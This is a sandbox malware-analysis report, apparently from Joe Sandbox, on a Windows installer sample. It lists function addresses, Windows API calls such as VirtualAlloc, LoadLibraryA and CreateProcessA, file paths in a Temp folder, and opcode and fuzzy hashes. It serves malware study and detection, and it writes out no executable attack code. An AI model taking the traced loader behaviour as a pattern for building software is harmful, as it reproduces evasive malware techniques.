Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 4199424cdd911ade4eb2abdec76784ff09b2342150b3acef81222138bde116dc
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: B7D0EC32000609BBDF115F90DD05FAB371DEB08310F004826BE59A4090D6759520AB55

Function 00401563 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

ShowWindow.USER32(0001040A), ref: 00401596

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
Instruction ID: dd78d0217ab0626d0a7a3bfb5b7a36ba0d54d57a697f982decce5ead7147db90
Opcode Fuzzy Hash: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
Instruction Fuzzy Hash: 64D0C766704114E7C602D6AD9A4559D639497D5355B304033E102B51E1D1BC460266DF

Function 004040C7 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010404,00000000,00000000,00000000), ref: 004040D9

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
Instruction ID: 4e90d0d88409270038b8e5dd21ed965c243834f72d7675745fce4010ef402404
Opcode Fuzzy Hash: a3efc5eb78e3e56d017e2e6455c4acb5d850ed487973469c59e03f22f97d3db8
Instruction Fuzzy Hash: 90C09B717407017BFA20CB689D49F077794AB90700F14C4297351F50E5C674D410DA1C

Function 00403200 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F89,00042BE4), ref: 0040320E

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D

Function 004040B0 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403EE0), ref: 004040BE

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
Instruction ID: f42b45c65ed6a3ee6e87ec929b41dfaaf359f69b17cd9f6c2b1881eba3545dd7
Opcode Fuzzy Hash: 346968a0720bb3734bf3dae4b81c014f7857494700bdb546aecc84c256ab8e1e
Instruction Fuzzy Hash: 64B09235180A00AAEA114B00DE09F457A62A7A4701F008068B250240F1CAB200A1DB08

Function 0040409D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403E79), ref: 004040A7

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
Instruction ID: 939548ffee5b58c9ca03ae204caad8327118cb5bb39276deea9dcfc8bbd505dc
Opcode Fuzzy Hash: bf910cdad2a26b56ee3b85a0ed98412bb2a8b11df0198d0adf4484009f2821d5
Instruction Fuzzy Hash: 65A00176444101AFCA02AF50EF09D4ABF62ABA4705B22843AE695940368A364872FF1D

Function 70022A38 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 70022AF7

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 98ccfd1f61e53e26ccdfccc5b97b95d4a9007ade02fe2b514d1ebcd62e4f34d2
Instruction ID: d21092361dcdf761e70d0b83bb978fab9b63b28275ca11d3d3588a519f030466
Opcode Fuzzy Hash: 98ccfd1f61e53e26ccdfccc5b97b95d4a9007ade02fe2b514d1ebcd62e4f34d2
Instruction Fuzzy Hash: F2413B73900204BFEB21DFF5FC82B5D7BB5EB04B36F30452AE60586162C774A8C28A65

Function 00401F48 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Part of subcall function 0040568C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
Part of subcall function 0040568C: CloseHandle.KERNEL32(?), ref: 004056C2

CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D

Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D

Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
Instruction ID: 492013b03639ae684c90f9e5668eb43d68f0c3151a551265a361b9bf3657de6d
Opcode Fuzzy Hash: ab329a5fbe1a2bb80e6d7f0c1e62c441a25b0281b2f032684fa4d7b26fa7afa5
Instruction Fuzzy Hash: 44F09072A04111EBCF11BBA59A859EE72A8DB41318F11017FF901B72D2C37C4A429AAE

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E9

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
Instruction ID: 58a32f90f567def110640d9dc390567cb18a6fab0a7cd362fc6929561968ffa9
Opcode Fuzzy Hash: 4a6513538906c2ad888d603f4eec974da145158fa5c322b66a4fc234cd88381b
Instruction Fuzzy Hash: D3D05E73A10201CBD701EBB8AE8485E73B8E7513157204837D542F2191E6B8C9428628

Non-executed Functions

Function 0040450D Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040455C
SetWindowTextA.USER32(00000000,?), ref: 00404586
SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
CoTaskMemFree.OLE32(00000000), ref: 00404642
lstrcmpiA.KERNEL32(Call,0079F548), ref: 00404674
lstrcatA.KERNEL32(?,Call), ref: 00404680
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692

Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700

Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
Part of subcall function 00406257: CharNextA.USER32(?,"C:\Users\user\Desktop\H33UCslPzv.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
Part of subcall function 00406257: CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1

GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,00000001,0079E518,?,?,000003FB,?), ref: 00404750
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B

Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D

Strings

Call, xrefs: 0040466E, 00404673, 0040467E
A, xrefs: 00404630
C:\Users\user\AppData\Local\Temp\unscorified, xrefs: 0040465D

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp\unscorified$Call
API String ID: 2624150263-1894173936
Opcode ID: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
Opcode Fuzzy Hash: 426c689e6bfd3f7724a5f807d599469a9c9a79d675bf4b1419e56df68b0f1dd0
Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69

Function 70021A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 70021215: GlobalAlloc.KERNEL32(00000040,70021233,?,700212CF,-7002404B,700211AB,-000000A0), ref: 7002121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 70021BC4
lstrcpyA.KERNEL32(00000008,?), ref: 70021C0C
lstrcpyA.KERNEL32(00000408,?), ref: 70021C16
GlobalFree.KERNEL32(00000000), ref: 70021C29
GlobalFree.KERNEL32(?), ref: 70021D09
GlobalFree.KERNEL32(?), ref: 70021D0E
GlobalFree.KERNEL32(?), ref: 70021D13
GlobalFree.KERNEL32(00000000), ref: 70021EFA
lstrcpyA.KERNEL32(?,?), ref: 70022098
GetModuleHandleA.KERNEL32(00000008), ref: 70022114
LoadLibraryA.KERNEL32(00000008), ref: 70022125
GetProcAddress.KERNEL32(?,?), ref: 7002217E
lstrlenA.KERNEL32(00000408), ref: 70022198

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: ab50ab7eda5e10dc1bf96abc62e307ee394e6c38eaafddfd1b9488961c6addbf
Instruction ID: 6cede08fee887c9c7b3d593f8c330f8c42695dc319edb34ecc5b52c1f8c2ad60
Opcode Fuzzy Hash: ab50ab7eda5e10dc1bf96abc62e307ee394e6c38eaafddfd1b9488961c6addbf
Instruction Fuzzy Hash: 9A22A071D04209EFDB228FB4ED847EDBBFAFB14B26F20452ED196A2281D7745941CB50

Function 00402138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408410,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021BA
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408400,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402269

Strings

C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 004021FA

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\unscorified\Pacinian
API String ID: 123533781-1480192069
Opcode ID: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
Instruction ID: b20e6ddc0005349e031541e3270fed9150ef90c2934288fc693311ea7f84ec63
Opcode Fuzzy Hash: 8c1491b70ee9da71462547a4ad139fcbd62dd758efc4c42bbf0e79f38f17cd9a
Instruction Fuzzy Hash: 1F511871A00209AFCF00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54

Function 00402765 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
